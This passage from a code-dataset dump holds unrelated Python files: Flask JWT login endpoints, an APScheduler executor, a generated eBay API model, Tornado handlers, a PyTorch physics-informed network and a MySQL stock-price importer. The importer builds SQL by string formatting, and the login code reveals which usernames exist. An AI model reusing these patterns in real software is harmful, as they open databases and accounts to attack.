@jwt_refresh_token_required\n def post(self):\n current_user = get_jwt_identity()\n access_token = create_access_token(identity = current_user)\n return {'access_token': access_token}\n\nclass Userlogin(Resource):\n\n def post(self,username):\n\n result = user_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n if user == None:\n return {\n 'message': 'username not exist!'\n }, 403\n else:\n if encrypt.verify_hash(result['password'],user.password):\n access_token = create_access_token(identity = result['username'])\n refresh_token = create_refresh_token(identity = result['username'])\n return {\n 'message': '',\n 'user': user_schema.dump(user),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n else:\n return {\n 'message': 'password not match'\n }\n\n def put(self):\n\n result = user_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n\n if user != None:\n user = UserModel(result['username'], result['email'], result ['password'])\n user.update_user()\n return {\n 'message': 'Update user success',\n 'user': user_schema.dump(user),\n }\n else:\n return {\n 'message': 'Can not update!',\n 'user': UserModel.username\n }\n\nclass UserRegistration(Resource):\n\n def post(self):\n\n result = register_schema.load(getdata.get_param())\n user = UserModel.get_user(result['username'])\n if user != None:\n return {\n 'message': 'username {0} is exist!'.format(result['username'])\n }, 403\n else:\n try:\n user = UserModel(result['username'],result['email'],encrypt.generate_hash(result['password']))\n user.add_user()\n access_token = create_access_token(identity = result['username'])\n refresh_token = create_refresh_token(identity = result['username'])\n return {\n 'message': 'Registration success',\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n except:\n return {\n 'message': 'database insert error',\n }\n\n return {\n 'message': '',\n 'user': user_schema.dump(user)\n }\n\nclass UserLogoutAccess(Resource):\n @jwt_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti = jti)\n revoked_token.add()\n return {'message': 'Access token has been revoked'}\n except:\n return {'message': 'Something went wrong'}, 500\n\n\nclass UserLogoutRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n jti = get_raw_jwt()['jti']\n try:\n revoked_token = RevokedTokenModel(jti = jti)\n revoked_token.add()\n return {'message': 'Refresh token has been revoked'}\n except:\n return {'message': 'Something went wrong'}, 500\n\n#class Users(Resource):\n# def get(self):\n# return {\n# 'message': '',\n# 'users': user_schema.dump(UserModel.get_all_user())\n# }\n\n ","sub_path":"resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537092005","text":"from __future__ import annotations\n\nfrom collections import OrderedDict\nfrom collections.abc import Coroutine\nfrom dataclasses import dataclass, field\nfrom datetime import datetime, timezone\nfrom traceback import format_exc\nfrom typing import Any, Callable, List\n\nfrom anyio import create_task_group\nfrom anyio.abc import TaskGroup\nfrom apscheduler.abc import EventHub, Executor, Job\nfrom apscheduler.eventhubs.local import LocalEventHub\nfrom apscheduler.events import (\n Event, JobAdded, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated)\n\n\n@dataclass\nclass LocalExecutor(Executor):\n \"\"\"Runs jobs locally in a task group.\"\"\"\n\n _event_hub: EventHub = field(init=False, default_factory=LocalEventHub)\n _task_group: TaskGroup = field(init=False)\n _queued_jobs: OrderedDict[Job, None] = field(init=False, default_factory=OrderedDict)\n _running_jobs: OrderedDict[Job, None] = field(init=False, default_factory=OrderedDict)\n\n async def __aenter__(self) -> LocalExecutor:\n self._task_group = create_task_group()\n await self._task_group.__aenter__()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb) -> None:\n await self._task_group.__aexit__(exc_type, exc_val, exc_tb)\n\n async def _run_job(self) -> None:\n job = self._queued_jobs.popitem(last=False)[0]\n\n # Check if the job started before the deadline\n if job.start_deadline:\n tz = job.scheduled_start_time.tzinfo\n start_time = datetime.now(tz)\n if start_time >= job.start_deadline:\n event = JobDeadlineMissed(\n start_time, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,\n scheduled_start_time=job.scheduled_start_time,\n start_deadline=job.start_deadline\n )\n await self._event_hub.publish(event)\n return\n else:\n tz = timezone.utc\n start_time = datetime.now(tz)\n\n # Set the job as running and publish a job update event\n self._running_jobs[job] = None\n job.started_at = start_time\n event = JobUpdated(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time\n )\n await self._event_hub.publish(event)\n\n try:\n return_value = job.func(*job.args, **job.kwargs)\n if isinstance(return_value, Coroutine):\n return_value = await return_value\n except Exception as exc:\n event = JobFailed(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time,\n start_time=start_time, start_deadline=job.start_deadline,\n formatted_traceback=format_exc(), exception=exc)\n else:\n event = JobSuccessful(\n timestamp=datetime.now(tz), job_id=job.id, task_id=job.task_id,\n schedule_id=job.schedule_id, scheduled_start_time=job.scheduled_start_time,\n start_time=start_time, start_deadline=job.start_deadline, return_value=return_value\n )\n\n del self._running_jobs[job]\n await self._event_hub.publish(event)\n\n async def submit_job(self, job: Job) -> None:\n self._queued_jobs[job] = None\n await self._task_group.spawn(self._run_job)\n\n event = JobAdded(datetime.now(timezone.utc), job.id, job.task_id, job.schedule_id,\n job.scheduled_start_time)\n await self._event_hub.publish(event)\n\n async def get_jobs(self) -> List[Job]:\n return list(self._queued_jobs)\n\n async def subscribe(self, callback: Callable[[Event], Any]) -> None:\n await self._event_hub.subscribe(callback)\n","sub_path":"apscheduler/workers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"226013840","text":"# coding: utf-8\n\n\"\"\"\n Feed API\n\n

The Feed API lets sellers upload input files, download reports and files including their status, filter reports using URI parameters, and retrieve customer service metrics task details.

# noqa: E501\n\n OpenAPI spec version: v1.3.1\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nclass CustomerServiceMetricTaskCollection(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'href': 'str',\n 'limit': 'int',\n 'next': 'str',\n 'offset': 'int',\n 'prev': 'str',\n 'tasks': 'list[ServiceMetricsTask]',\n 'total': 'int'\n }\n\n attribute_map = {\n 'href': 'href',\n 'limit': 'limit',\n 'next': 'next',\n 'offset': 'offset',\n 'prev': 'prev',\n 'tasks': 'tasks',\n 'total': 'total'\n }\n\n def __init__(self, href=None, limit=None, next=None, offset=None, prev=None, tasks=None, total=None): # noqa: E501\n \"\"\"CustomerServiceMetricTaskCollection - a model defined in Swagger\"\"\" # noqa: E501\n self._href = None\n self._limit = None\n self._next = None\n self._offset = None\n self._prev = None\n self._tasks = None\n self._total = None\n self.discriminator = None\n if href is not None:\n self.href = href\n if limit is not None:\n self.limit = limit\n if next is not None:\n self.next = next\n if offset is not None:\n self.offset = offset\n if prev is not None:\n self.prev = prev\n if tasks is not None:\n self.tasks = tasks\n if total is not None:\n self.total = total\n\n @property\n def href(self):\n \"\"\"Gets the href of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The URI of the current page of results. # noqa: E501\n\n :return: The href of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: str\n \"\"\"\n return self._href\n\n @href.setter\n def href(self, href):\n \"\"\"Sets the href of this CustomerServiceMetricTaskCollection.\n\n The URI of the current page of results. # noqa: E501\n\n :param href: The href of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._href = href\n\n @property\n def limit(self):\n \"\"\"Gets the limit of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The value of the limit parameter submitted in the request, which is the maximum number of tasks to return per page, from the result set. A result set is the complete set of tasks returned by the method. Note: Even though this parameter is not required to be submitted in the request, the parameter defaults to 10 if omitted. Note: If this is the last or only page of the result set, the page may contain fewer tasks than the limit value. To determine the number of pages in a result set, divide the total value (total number of tasks matching input criteria) by this limit value, and then round up to the next integer. For example, if the total value was 120 (120 total tasks) and the limit value was 50 (show 50 tasks per page), the total number of pages in the result set is three, so the seller would have to make three separate getCustomerServiceMetricTasks calls to view all tasks matching the input criteria. # noqa: E501\n\n :return: The limit of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: int\n \"\"\"\n return self._limit\n\n @limit.setter\n def limit(self, limit):\n \"\"\"Sets the limit of this CustomerServiceMetricTaskCollection.\n\n The value of the limit parameter submitted in the request, which is the maximum number of tasks to return per page, from the result set. A result set is the complete set of tasks returned by the method. Note: Even though this parameter is not required to be submitted in the request, the parameter defaults to 10 if omitted. Note: If this is the last or only page of the result set, the page may contain fewer tasks than the limit value. To determine the number of pages in a result set, divide the total value (total number of tasks matching input criteria) by this limit value, and then round up to the next integer. For example, if the total value was 120 (120 total tasks) and the limit value was 50 (show 50 tasks per page), the total number of pages in the result set is three, so the seller would have to make three separate getCustomerServiceMetricTasks calls to view all tasks matching the input criteria. # noqa: E501\n\n :param limit: The limit of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: int\n \"\"\"\n\n self._limit = limit\n\n @property\n def next(self):\n \"\"\"Gets the next of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The relative path to the call URI for the next page of results. This value is returned if there is an additional page of results to return from the result set. # noqa: E501\n\n :return: The next of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: str\n \"\"\"\n return self._next\n\n @next.setter\n def next(self, next):\n \"\"\"Sets the next of this CustomerServiceMetricTaskCollection.\n\n The relative path to the call URI for the next page of results. This value is returned if there is an additional page of results to return from the result set. # noqa: E501\n\n :param next: The next of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._next = next\n\n @property\n def offset(self):\n \"\"\"Gets the offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The number of results skipped in the result set before returning the first result. This value can be set in the request with the offset query parameter. Note: The items in a paginated result set use a zero-based list where the first item in the list has an offset of 0. # noqa: E501\n\n :return: The offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: int\n \"\"\"\n return self._offset\n\n @offset.setter\n def offset(self, offset):\n \"\"\"Sets the offset of this CustomerServiceMetricTaskCollection.\n\n The number of results skipped in the result set before returning the first result. This value can be set in the request with the offset query parameter. Note: The items in a paginated result set use a zero-based list where the first item in the list has an offset of 0. # noqa: E501\n\n :param offset: The offset of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: int\n \"\"\"\n\n self._offset = offset\n\n @property\n def prev(self):\n \"\"\"Gets the prev of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The URI for the previous page of results. This parameter is returned if a previous page of results from the result set exists. # noqa: E501\n\n :return: The prev of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: str\n \"\"\"\n return self._prev\n\n @prev.setter\n def prev(self, prev):\n \"\"\"Sets the prev of this CustomerServiceMetricTaskCollection.\n\n The URI for the previous page of results. This parameter is returned if a previous page of results from the result set exists. # noqa: E501\n\n :param prev: The prev of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: str\n \"\"\"\n\n self._prev = prev\n\n @property\n def tasks(self):\n \"\"\"Gets the tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n An array of the customer service tasks on this page. The tasks are sorted by creation date. An empty array is returned if the filter criteria excludes all tasks. # noqa: E501\n\n :return: The tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: list[ServiceMetricsTask]\n \"\"\"\n return self._tasks\n\n @tasks.setter\n def tasks(self, tasks):\n \"\"\"Sets the tasks of this CustomerServiceMetricTaskCollection.\n\n An array of the customer service tasks on this page. The tasks are sorted by creation date. An empty array is returned if the filter criteria excludes all tasks. # noqa: E501\n\n :param tasks: The tasks of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: list[ServiceMetricsTask]\n \"\"\"\n\n self._tasks = tasks\n\n @property\n def total(self):\n \"\"\"Gets the total of this CustomerServiceMetricTaskCollection. # noqa: E501\n\n The total number of tasks that match the criteria. # noqa: E501\n\n :return: The total of this CustomerServiceMetricTaskCollection. # noqa: E501\n :rtype: int\n \"\"\"\n return self._total\n\n @total.setter\n def total(self, total):\n \"\"\"Sets the total of this CustomerServiceMetricTaskCollection.\n\n The total number of tasks that match the criteria. # noqa: E501\n\n :param total: The total of this CustomerServiceMetricTaskCollection. # noqa: E501\n :type: int\n \"\"\"\n\n self._total = total\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(CustomerServiceMetricTaskCollection, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CustomerServiceMetricTaskCollection):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"src/ebay_rest/api/sell_feed/models/customer_service_metric_task_collection.py","file_name":"customer_service_metric_task_collection.py","file_ext":"py","file_size_in_byte":11241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"636869580","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by mengqingyun on 14-5-22.\n\"\"\"\ncommon handler,webhandler,apihandler\n要获得torngas的中间件等特性需继承这些handler\n\"\"\"\nimport json\nimport tornado.locale\nfrom tornado.web import RequestHandler, HTTPError\nfrom logger.client import general_logger\nfrom torngas.settings_manager import settings\nfrom torngas.mixins.exception import UncaughtExceptionMixin\n\n\nclass CommonHandler(RequestHandler):\n _url_kwargs = {}\n\n def __init__(self, application, request, **kwargs):\n if kwargs:\n self._url_kwargs.update(kwargs)\n kwargs.clear()\n super(CommonHandler, self).__init__(application, request, **kwargs)\n\n def prepare(self):\n self.application.middleware_manager.run_request_hooks(self)\n return self.on_prepare()\n\n def on_prepare(self):\n pass\n\n def render_string(self, template_name, **kwargs):\n self.application.middleware_manager.run_render_hooks(self, template_name, **kwargs)\n return super(CommonHandler, self).render_string(template_name, **kwargs)\n\n def finish(self, chunk=None):\n # finish之前可能执行过多次write,反而chunk可能为None\n # 真正的chunk数据在self._write_buffer中,包含历次write的数据\n # 这里将chunk数据write进_write_buffer中,然后将chunk置空\n if chunk:\n self.write(chunk)\n chunk = None\n self.application.middleware_manager.run_response_hooks(self, self._write_buffer)\n super(CommonHandler, self).finish(chunk)\n\n def write(self, chunk, status=None):\n if status:\n self.set_status(status)\n super(CommonHandler, self).write(chunk)\n\n def log_exception(self, typ, value, tb):\n \"\"\"重写404请求的异常处理\n \"\"\"\n if isinstance(value, HTTPError):\n if value.log_message:\n format = \"%d %s: \" + value.log_message\n args = ([value.status_code, self._request_summary()] +\n list(value.args))\n general_logger.warning(format, *args)\n else:\n general_logger.error(\"Uncaught exception %s\\n%r\", self._request_summary(),\n self.request, exc_info=(typ, value, tb))\n\n def on_finish(self):\n self.application.middleware_manager.run_endcall_hooks(self)\n self.complete_finish()\n\n def complete_finish(self):\n pass\n\n def get_user_locale(self):\n if settings.TRANSLATIONS_CONF.use_accept_language:\n return None\n\n return tornado.locale.get(settings.TRANSLATIONS_CONF.locale_default)\n\n\nclass WebHandler(UncaughtExceptionMixin, CommonHandler):\n def create_template_loader(self, template_path):\n loader = self.application.tmpl\n if loader is None:\n return super(CommonHandler, self).create_template_loader(template_path)\n else:\n return loader(template_path)\n\n\nclass ApiHandler(CommonHandler):\n def get_format(self):\n format = self.get_argument('format', None)\n if not format:\n accept = self.request.headers.get('Accept')\n if accept:\n if 'javascript' in accept:\n format = 'jsonp'\n else:\n format = 'json'\n return format or 'json'\n\n def write_api(self, obj=None, nofail=False):\n if not obj:\n obj = {}\n format = self.get_format()\n if format == 'json':\n self.set_header(\"Content-Type\", \"application/json; charset=UTF-8\")\n self.write(json.dumps(obj))\n elif format == 'jsonp':\n self.set_header(\"Content-Type\", \"application/javascript\")\n callback = self.get_argument('callback', 'callback')\n self.write('%s(%s);' % (callback, json.dumps(obj)))\n elif nofail:\n self.write(json.dumps(obj))\n else:\n raise HTTPError(400, 'Unknown response format requested: %s' % format)\n\n\nclass ErrorHandler(UncaughtExceptionMixin, CommonHandler):\n def prepare(self):\n super(ErrorHandler, self).prepare()\n self.set_status(404)\n raise HTTPError(404)","sub_path":"torngas/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"71843687","text":"import plot\nimport simulation\nimport json\nimport os\n\n\ndef simulations(directory):\n\n\thistories = []\n\tgraphs = []\n\tfail = []\n\n\tenv = json.loads(open(\"presets/{}.json\".format(directory), \"r\").read())\n\n\tfor i in range(10):\n\t\th, g, failures = simulation.simulate(env)\n\t\thistories.append(h)\n\t\tgraphs.append(g)\n\t\tfail.append(failures)\n\n\tif not os.path.exists(\"plots/{}\".format(directory)):\n\t\tos.mkdir(\"plots/{}\".format(directory))\n\tplot.plot_multiple_histories(histories, directory)\n\tplot.plot_wealth_distribution(graphs, directory)\n\tplot.plot_wealth_distribution_in(graphs, directory)\n\n\tplot.plot_path_length(graphs[0], directory)\n\n\tundirected = []\n\n\tfor gs in graphs:\n\t\tundirected.append(gs.to_undirected())\n\n\tplot.plot_robustness_random(undirected, 10, directory)\n\tplot.plot_robustness_coordinated(undirected, 7, directory)\n\n\tprint(fail)\n\n\nif __name__ == \"__main__\":\n\tsimulations(\"wealth_paste\")\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"124977854","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nclass LinearBlock(nn.Module):\n\n def __init__(self, in_nodes, out_nodes):\n super(LinearBlock, self).__init__()\n self.layer = nn.utils.weight_norm(nn.Linear(in_nodes, out_nodes), dim = 0)\n\n def forward(self, x):\n x = self.layer(x)\n x = x * torch.sigmoid(x) # SiLU\n return x\n\nclass PINN(nn.Module):\n\n def __init__(self, data, layer_list):\n super(PINN, self).__init__()\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.input_layer = nn.utils.weight_norm(nn.Linear(layer_list[0], layer_list[1]), dim = 0)\n self.hidden_layers = self._make_layer(layer_list[1:-1])\n self.output_layer = nn.utils.weight_norm(nn.Linear(layer_list[-2], layer_list[-1]), dim = 0)\n self.data = data\n self.mean = self.data.mean(dim=0).to(device)\n self.sig = torch.sqrt(self.data.var(dim=0)).to(device)\n\n def _make_layer(self, layer_list):\n layers = []\n for i in range(len(layer_list) - 1):\n block = LinearBlock(layer_list[i], layer_list[i + 1])\n layers.append(block)\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = (x - self.mean) / self.sig\n x = self.input_layer(x)\n x = x * torch.sigmoid(x)\n x = self.hidden_layers(x)\n x = self.output_layer(x)\n return x\n\ndef weights_init(m):\n if isinstance(m, nn.Linear):\n torch.nn.init.xavier_normal_(m.weight)\n\ndef pinn(data, layer_list):\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n model = PINN(data, layer_list).to(device)\n model.apply(weights_init)\n print(\"Operation mode: \", device)\n return model\n\ndef fwd_gradients(obj, x):\n dummy = torch.ones_like(obj)\n derivative = torch.autograd.grad(obj, x, dummy, create_graph= True)[0]\n return derivative\n\ndef Navier_Stokes_2D(c, u, v, p, txy, Pec, Rey):\n c_txy = fwd_gradients(c, txy)\n u_txy = fwd_gradients(u, txy)\n v_txy = fwd_gradients(v, txy)\n p_txy = fwd_gradients(p, txy)\n\n c_t = c_txy[:, 0:1]\n c_x = c_txy[:, 1:2]\n c_y = c_txy[:, 2:3]\n u_t = u_txy[:, 0:1]\n u_x = u_txy[:, 1:2]\n u_y = u_txy[:, 2:3]\n v_t = v_txy[:, 0:1]\n v_x = v_txy[:, 1:2]\n v_y = v_txy[:, 2:3]\n p_x = p_txy[:, 1:2]\n p_y = p_txy[:, 2:3]\n\n c_xx = fwd_gradients(c_x, txy)[:, 1:2]\n c_yy = fwd_gradients(c_y, txy)[:, 2:3]\n u_xx = fwd_gradients(u_x, txy)[:, 1:2]\n u_yy = fwd_gradients(u_y, txy)[:, 2:3]\n v_xx = fwd_gradients(v_x, txy)[:, 1:2]\n v_yy = fwd_gradients(v_y, txy)[:, 2:3]\n\n e1 = c_t + (u * c_x + v * c_y) - (1.0 / Pec) * (c_xx + c_yy)\n e2 = u_t + (u * u_x + v * u_y) + p_x - (1.0 / Rey) * (u_xx + u_yy)\n e3 = v_t + (u * v_x + v * v_y) + p_y - (1.0 / Rey) * (v_xx + v_yy)\n e4 = u_x + v_y\n\n return e1, e2, e3, e4\n\ndef Gradient_Velocity_2D(u, v, txy):\n u_txy = fwd_gradients(u, txy)\n v_txy = fwd_gradients(v, txy)\n\n u_x = u_txy[:, 1:2]\n u_y = u_txy[:, 2:3]\n v_x = v_txy[:, 1:2]\n v_y = v_txy[:, 2:3]\n\n return u_x, v_x, u_y, v_y\n\ndef test_data(T_star, X_star, Y_star, C_star, U_star, V_star, P_star):\n snap = np.random.randint(0, 200)\n t_star = T_star[:, snap:snap+1]\n x_star = X_star[:, snap:snap+1]\n y_star = Y_star[:, snap:snap+1]\n c_star = C_star[:, snap:snap+1]\n u_star = U_star[:, snap:snap+1]\n v_star = V_star[:, snap:snap+1]\n p_star = P_star[:, snap:snap+1]\n\n variables_star = torch.FloatTensor(np.concatenate((t_star, x_star, y_star), 1)) # N x 3\n target_star = torch.FloatTensor(np.concatenate((c_star, u_star, v_star, p_star), 1)) # N x 4\n\n return variables_star, target_star\n\ndef relative_error(pred, target):\n return torch.sqrt(torch.mean((pred - target)**2)/torch.mean((target - torch.mean(target))**2)).cpu().numpy()\n\nif __name__ == \"__main__\":\n import numpy as np\n dummy_data = torch.Tensor(np.random.normal(0,1,size=(100,3)))\n layer_list = [3] + 10*[200] + [4]\n model = pinn(dummy_data, layer_list)\n print(model)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"149792675","text":"#coding:utf-8\n\nimport db_config\nfrom functions import exchange_code\nimport logging\nimport datetime\nimport csv\nimport mysql.connector\nimport sys\nimport slackweb\nimport configparser\n\n\nBASE_DIR = '/usr/local/script/'\naccount = BASE_DIR + 'config/account.ini'\naccount_config = configparser.ConfigParser()\naccount_config.read(account, 'UTF-8')\n\npath = BASE_DIR + 'config/path.ini'\npath_config = configparser.ConfigParser()\npath_config.read(path, 'UTF-8')\n\n# Constants\nDB_USER = account_config.get('db', 'DB_USER')\nDB_PASSWORD = account_config.get('db', 'DB_PASSWORD')\nDB_HOST = account_config.get('db', 'DB_HOST')\nDB_DATABASE = account_config.get('db', 'DB_DATABASE')\nTABLE = 'japan_all_stock_prices'\nCSV_FILE_DIR = path_config.get('csv_path', 'data_base') + path_config.get('csv_path', 'japan_all_stock_prices')\n\nargs = sys.argv\n\nif __name__ == '__main__':\n # モジュール名でロガーを生成する(メインモジュールは 名前が '__main__' になる)\n log = logging.getLogger(__name__)\n # Slack Incoming webhook設定\n slack_log_url = account_config.get('slack', 'slack_log_url')\n slack = slackweb.Slack(url=slack_log_url)\n\n log.info('日本株全銘柄テーブルインポート処理 : 開始')\n\n # 対象の日付を設定(引数でYYYYMMDD形式で日付を入れるとその日付のファイルを対象とする)\n if len(args) < 2:\n TODAY = datetime.date.today()\n else:\n TARGET_DAY = args[1]\n TODAY = datetime.datetime(int(TARGET_DAY[:4]), int(TARGET_DAY[4:6]), int(TARGET_DAY[-2:]))\n\n # Target File Name\n file_name_date_part = str(TODAY.year) + '{:0=2}'.format(TODAY.month) + '{:0=2}'.format(TODAY.day)\n file_name = 'japan-all-stock-prices_' + file_name_date_part + '.csv'\n\n log.info('テーブル名:%s 対象ファイル:%s' % (TABLE, file_name))\n\n with open (CSV_FILE_DIR + file_name) as csvfile:\n reader = csv.reader(csvfile)\n # headerと日経225、TOPIXをスキップする\n for i in range(3):\n next(reader, None)\n\n # MariaDB connect\n try:\n conn = mysql.connector.connect(user=DB_USER, password=DB_PASSWORD, host=DB_HOST, database=DB_DATABASE)\n cursor = conn.cursor()\n\n for row in reader:\n security_code = row[0] if row[0] != '-' else 'null'\n dt = file_name_date_part\n company_name = row[1] if row[1] != '-' else 'null'\n stock_exchange_code = exchange_code.get_stock_exchange_code(row[2])\n industry_type = exchange_code.get_industry_type(row[3])\n opening_price = row[9] if row[9] != '-' else 'null'\n closing_price = row[5] if row[5] != '-' else 'null'\n high_price = row[10] if row[10] != '-' else 'null'\n low_price = row[11] if row[11] != '-' else 'null'\n day_before_ratio = row[6] if row[6] != '-' else 'null'\n day_before_ratio_percentage = row[7] if row[7] != '-' else 'null'\n last_day_closing_price = row[8] if row[8] != '-' else 'null'\n volume = row[12] if row[12] != '-' else 'null'\n trading_value = row[13] if row[13] != '-' else 'null'\n market_capitalization = row[14] if row[14] != '-' else 'null'\n price_range_lower_limit = row[15] if row[15] != '-' else'null'\n price_range_upper_limit = row[16] if row[16] != '-' else 'null'\n cursor.execute('''INSERT INTO %s.%s (security_code, dt, company_name,\n stock_exchange_code, industry_type, opening_price, closing_price, high_price, low_price,\n day_before_ratio, day_before_ratio_percentage, last_day_closing_price, volume,\n trading_value, market_capitalization, price_range_lower_limit, price_range_upper_limit)\n VALUES(%s, '%s', \"%s\", %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n ''' % (DB_DATABASE, TABLE, security_code, dt, company_name, stock_exchange_code, industry_type, opening_price,\n closing_price, high_price, low_price, day_before_ratio, day_before_ratio_percentage,\n last_day_closing_price, volume, trading_value, market_capitalization,\n price_range_lower_limit, price_range_upper_limit))\n except mysql.connector.Error as e:\n log.error(e)\n conn.close()\n\n conn.commit()\n conn.close()\n\n # テーブルINSERT件数確認\n try:\n conn = mysql.connector.connect(user=DB_USER, password=DB_PASSWORD, host=DB_HOST, database=DB_DATABASE)\n cursor = conn.cursor()\n count_query = \"\"\"SELECT dt, COUNT(*) FROM %s.%s WHERE dt = '%s' GROUP BY dt\"\"\" % (DB_DATABASE, TABLE, TODAY)\n cursor.execute(count_query)\n result = cursor.fetchone()\n result_word = \"処理日時:%s 取得件数:%s\" % (result[0], result[1])\n slack.notify(text=\"日本株全銘柄テーブルインポート\\n\" + result_word)\n except mysql.connector.Error as e:\n log.error(e)\n conn.close()\n\n log.info('日本株全銘柄テーブルインポート処理 : 終了')\n conn.close()\n","sub_path":"script/db/import_japan_all_stock_prices.py","file_name":"import_japan_all_stock_prices.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"112401307","text":"import pandas as pd\r\nimport os\r\nimport re\r\n\r\nbusinesspath = \"C:/Users/David/YELP_PROJECT/datasets/yelp_academic_dataset_business_cleaned.csv\"\r\nbusinessdf = pd.read_csv(businesspath, error_bad_lines=False, encoding = \"ISO-8859-1\").fillna(value='NA')\r\n\r\ninpath = \"C:/Users/David/YELP_PROJECT/datasets/review_groups/\"\r\n#all_topics = pd.DataFrame(columns=('business_id', '1-2_Stars topic','4-5_Stars topic'))\r\ndata_list = []\r\nfor file in os.listdir(inpath):\r\n file_df = pd.read_csv(inpath+file, error_bad_lines=False, encoding = \"ISO-8859-1\").fillna(value='NA')\r\n file_df = file_df.drop('1-2_Stars', 1).drop('4-5_Stars', 1).drop('1-2_Stars_count', 1).drop('4-5_Stars_count', 1)\r\n data_list.append(file_df)\r\nall_topics = pd.concat(data_list)\r\n# all_topics.columns = (['1-2_star_topics','del1','4-5_star_topics','del2','business_id'])\r\n# all_topics = all_topics.drop('del1',1).drop('del2',1)\r\npath2 = \"C:/Users/David/YELP_PROJECT/datasets/experimental_concat.csv\"\r\npath3 = \"C:/Users/David/YELP_PROJECT/datasets/experimental_business.csv\"\r\nall_topics.to_csv(path2)\r\nnewdf = pd.merge(businessdf, all_topics, on='business_id')\r\nnewdf.to_csv(path3)\r\n#print(newdf)","sub_path":"capstone_project/experimental_WIP/review_topics_to_business_table.py","file_name":"review_topics_to_business_table.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"620650203","text":"from unittest import TestCase\n\nimport conwaysgameoflife\n\n\nclass TestPatternCanvas(TestCase):\n def test_init_with_glider(self):\n \"\"\"Test if a PatternCanvas can be initialised that it contains a glider.\n\n See:\n https://en.wikipedia.org/wiki/Glider_(Conway%27s_Life)\n for detailed description of this figure.\n \"\"\"\n\n test_pattern_canvas = conwaysgameoflife.PatternCanvas(\"glider\")\n\n 